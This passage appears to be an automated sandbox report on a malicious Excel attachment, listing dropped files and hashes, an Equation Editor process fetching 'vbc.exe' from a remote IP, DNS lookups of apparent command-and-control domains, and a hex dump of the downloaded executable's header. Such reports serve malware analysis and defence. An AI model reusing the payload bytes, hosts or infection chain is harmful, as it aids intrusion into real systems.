SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C46E2207.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103424
Entropy (8bit):	6.478883962622834
Encrypted:	false
SSDEEP:	1536:KyadpihizxoDXPNiYLe3ZLpdzYy19k3ncMlN7kOES9OO2nsWjcdIbUFaZVak:KyKiOLVnINSyOBIIbeaZVak
MD5:	E811908E17195BEA88661A6C3CB92B91
SHA1:	890857EF9EE4D3785086F3B86AB83AC8B913AEE9
SHA-256:	A9DF42DC541C9BAB258C914C002426C359B253D7425C5E6038E7384A1CF572FB
SHA-512:	5F5FA14FD98D699A37BF9F55E3D25F567F58179611C1DC1E56BEDE39F873CE731B33BCDC7C6D70C13D66DFB2130CF94D2412B9A295D4D79A138684FD1091D0D3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~.J.~.J.~.J...J.~.J.,.J.~.J.,#J.~.J.,.J.~.J...K.~.J...K.~.J.~.J.~.J...K.~.J...K.~.J...J.~.J...K.~.JRich.~.J........PE..L...I..a...........!......................................................................@..........................U..L...\U.......................................O...............................O..@............................................text............................... ..`.rdata...N.......P..................@..@.data....O...`...4...P..............@....rsrc...............................@..B.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\w8ymj9mvxgy277qah473 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	219333
Entropy (8bit):	7.993174761144856
Encrypted:	true
SSDEEP:	6144:WzcaN9fxkj0h27+aaZMK4sjGNATBmebit:Wzcu6O26f4sGjaq
MD5:	9F1DA5BF76CEE0067C0B852BC020ACC2
SHA1:	279BC1BAE6875A60E06039FFB146138DEAD7C6CF
SHA-256:	19057A959E5166348C03A91D7D147D124775A8A438E6B6E47288C5EF635BE16A
SHA-512:	362D19A989B5713BE9A5D953B5071A723C06B9AE6583276FDB91FA46C55A970084403B853389F1F8FBCB6DDDBA91908B2DBFD456BD79D8D6E18681A0D8E0386D
Malicious:	false
Preview:	.U+.Y...f......uj.....iO.!..............yT.....f.....2S\|.....2...]..8.Gm.>...4.b.e.}........=.n. M.....7~9.-/..lt...pIa...'^.....1$........)s.b.......X..uR.."yGU..9......e..{....2....-..9.....d?...G\.3q....]........c}..K.....Mm...Q.=..?....<R.4...f.O.9...t...c...I...............yT.....f.....2S\|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P......R(..rf,...I....k.;.)..~C..1.X...2Xva.&.&e..M.......A.....9.....d..."\....]........c}......^...m..~.Q.=..?....<f.4...fw..9%..t.....qZI.>.............yT.....f.....2S\|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P......R(..rf,...I....k.;.)..~C..1.X...2Xv.....e..wf.....PU...9.....d..."\......]........c}......^...m..~.Q.=..?....<f.4...fw..9%..t.....qZI.>.............yT.....f.....2S\|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P.*.....R(..rf,...I....k.;.)..~C..1.X...2Xv.....e..wf.....PU...9.....d..."\......]........c}

C:\Users\user\AppData\Local\Temp\~DF50F0E8E5645B9254.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5D47A23D2FA502C9.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF46076212F85A030.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFBA49336F871D2DD.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	190424
Entropy (8bit):	7.96227380481848
Encrypted:	false
SSDEEP:	3072:fetf+Tozc7CM5/lSqtarCMAch5AQZBgZdq3n4AZeyxfIAkLTmjeZYHPIMedWZ6Pa:feqMc+M5d6rASAQfgYZeyxqLTmjeddWt
MD5:	AE8569EDDE3FE5D5E50F9669BBBA54B0
SHA1:	FA19E75584925894B781BCDB1DC53C6B024F7B08
SHA-256:	ECEEB9918530B8AB023A2465BACC9C2E572C7AAA7ADD05DF882E49C28FBE6E5B
SHA-512:	A5A37A10D622A7897A38F8FB9DC17EC91E94E08D650A3E988A45EBFF3B047FBD86AEB156461AF70874E8E2CCFBDE879505314AF342BB340CE7B07926A3D1B285
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$PO5594.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	292696
Entropy (8bit):	7.940580532253791
Encrypted:	false
SSDEEP:	6144:wBlL/cZwF4JmEVpM2MJhVRcGO+LTYKJhUVTj9qsYKGV77ECn:CeZUSpMHwf4YRqsWvn
MD5:	11CBFA99FB5EBE8C09674E79B9834D96
SHA1:	6E94C5EF59E7A989D93C799217FBF1803B3BB4A4
SHA-256:	B7F38916FF521E44E651031EE54E631805F13963BAAF6FF6E3CC1AA72F1D0A43
SHA-512:	8429269ED2A747CF11DB3972AFA4A7A0CD59B4EA61D6D189EB17B660A66DD2A7FDEB6CD4F4439044665069060477F856D588634B0CF01F5F67CD6A039FE00CD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..\|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.96227380481848
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	PO5594.xlsx
File size:	190424
MD5:	ae8569edde3fe5d5e50f9669bbba54b0
SHA1:	fa19e75584925894b781bcdb1dc53c6b024f7b08
SHA256:	eceeb9918530b8ab023a2465bacc9c2e572c7aaa7add05df882e49c28fbe6e5b
SHA512:	a5a37a10d622a7897a38f8fb9dc17ec91e94e08d650a3e988a45ebff3b047fbd86aeb156461af70874e8e2ccfbde879505314af342bb340ce7b07926a3d1b285
SSDEEP:	3072:fetf+Tozc7CM5/lSqtarCMAch5AQZBgZdq3n4AZeyxfIAkLTmjeZYHPIMedWZ6Pa:feqMc+M5d6rASAQfgYZeyxqLTmjeddWt
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

Total Packets: 48
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2021 09:26:55.669755936 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:55.925766945 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:55.925940990 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:55.926331043 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.184113979 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.184144974 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.184161901 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.184178114 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.184197903 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.184236050 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.184242010 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.441936016 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.441970110 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.441982031 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.441999912 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.442017078 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.442033052 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.442049026 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.442065001 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.442214012 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.442279100 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698358059 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698430061 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698467970 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698507071 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698542118 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698545933 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698576927 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698580980 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698585987 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698607922 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698627949 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698633909 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698668957 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698677063 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698719025 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698720932 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698761940 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.698777914 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.698796988 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.699546099 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.699585915 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.699595928 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.699625015 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.699630022 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.699664116 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.699666023 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.699704885 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.701548100 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.955319881 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.955378056 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.955409050 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.955440044 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.955602884 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956068993 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956130981 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956151009 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956180096 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956188917 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956243038 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956248045 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956305981 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956310987 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956358910 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956363916 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956417084 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956423044 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956475019 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956479073 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956530094 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956537962 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956593037 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956598997 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956650972 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956655025 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956707001 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956722021 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956780910 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956810951 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956831932 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956840038 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.956943035 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.956953049 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957006931 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957012892 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957065105 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957067966 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957122087 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957128048 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957182884 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957201004 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957237005 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957262993 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957294941 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:56.957309961 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:56.957340002 CET	49165	80	192.168.2.22	103.232.53.25
Nov 2, 2021 09:26:57.211632967 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:57.211666107 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:57.211678028 CET	80	49165	103.232.53.25	192.168.2.22
Nov 2, 2021 09:26:57.211695910 CET	80	49165	103.232.53.25	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2021 09:28:15.107445002 CET	52167	53	192.168.2.22	8.8.8.8
Nov 2, 2021 09:28:15.142863035 CET	53	52167	8.8.8.8	192.168.2.22
Nov 2, 2021 09:28:25.225115061 CET	50591	53	192.168.2.22	8.8.8.8
Nov 2, 2021 09:28:25.263832092 CET	53	50591	8.8.8.8	192.168.2.22
Nov 2, 2021 09:28:30.676491022 CET	57805	53	192.168.2.22	8.8.8.8
Nov 2, 2021 09:28:30.724009991 CET	53	57805	8.8.8.8	192.168.2.22
Nov 2, 2021 09:28:36.070918083 CET	59030	53	192.168.2.22	8.8.8.8
Nov 2, 2021 09:28:36.195832014 CET	53	59030	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 2, 2021 09:28:15.107445002 CET	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.spacex-live.net	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:25.225115061 CET	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.schittstore.com	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:30.676491022 CET	192.168.2.22	8.8.8.8	0x9c63	Standard query (0)	www.metanetgateway.com	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:36.070918083 CET	192.168.2.22	8.8.8.8	0x30e0	Standard query (0)	www.sarahannsartstudio.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 2, 2021 09:28:15.142863035 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.spacex-live.net		104.21.75.173	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:15.142863035 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.spacex-live.net		172.67.179.179	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:25.263832092 CET	8.8.8.8	192.168.2.22	0xfc43	No error (0)	www.schittstore.com	schittstore.com		CNAME (Canonical name)	IN (0x0001)
Nov 2, 2021 09:28:25.263832092 CET	8.8.8.8	192.168.2.22	0xfc43	No error (0)	schittstore.com		66.29.132.90	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:30.724009991 CET	8.8.8.8	192.168.2.22	0x9c63	No error (0)	www.metanetgateway.com		75.2.60.5	A (IP address)	IN (0x0001)
Nov 2, 2021 09:28:36.195832014 CET	8.8.8.8	192.168.2.22	0x30e0	No error (0)	www.sarahannsartstudio.com	sarahannsartstudio.com		CNAME (Canonical name)	IN (0x0001)
Nov 2, 2021 09:28:36.195832014 CET	8.8.8.8	192.168.2.22	0x30e0	No error (0)	sarahannsartstudio.com		162.241.253.231	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

103.232.53.25

www.spacex-live.net

www.schittstore.com

www.metanetgateway.com

www.sarahannsartstudio.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	103.232.53.25	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2021 09:26:55.926331043 CET	0	OUT	GET /8880/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.232.53.25 Connection: Keep-Alive
Nov 2, 2021 09:26:56.184113979 CET	1	IN	HTTP/1.1 200 OK Date: Tue, 02 Nov 2021 08:27:00 GMT Server: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/7.4.24 Last-Modified: Tue, 02 Nov 2021 03:24:30 GMT ETag: "47758-5cfc5d4e71e00" Accept-Ranges: bytes Content-Length: 292696 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 